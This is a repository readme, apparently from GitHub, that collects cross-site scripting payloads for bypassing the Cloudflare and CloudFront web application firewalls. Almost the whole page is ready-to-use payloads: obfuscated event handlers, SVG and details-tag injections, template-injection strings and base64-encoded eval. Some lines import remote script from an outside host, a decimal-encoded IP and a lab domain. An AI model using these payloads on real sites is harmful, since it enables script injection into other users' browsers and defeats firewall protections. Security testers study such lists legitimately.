WAF bypass xss payloads

xss

XSS payloads for bypassing WAF. This repository is updating continuously.


WAF-bypass-xss-payloads

Trying to gather xss payloads from the internet that bypasses WAF. All credit goes to the owners of the payloads.

Cloudflare xss payloads

<style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;>
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
<svg><circle><set onbegin=prompt(1) attributename=fill>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
"%3balert`1`%3b"
asd"`> onpointerenter=x=prompt,x`XSS`
<x onauxclick=import('//1152848220/')>click
<x onauxclick=a=alert,a(domain)>click -@niksthehacker
<x onauxclick=import('//1152848220/')>click
<x onauxclick=import('//xss/')>click
\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss
{{constructor.constructor(alert`1`)()}}
javascript:new%20Function`al\ert\`1\``;
<script>Object.prototype.BOOMR = 1;
Object.prototype.url='https://portswigger-labs.net/xss/xss.js'</script> -https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

cloudfront xss payloads

">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;

For More Payload visit GitHub Link

Note:

These payloads may not be a global bypass but working on specific endpoints. OR some of These payloads may be fixed by the firewall corporation.But it is continuously updating.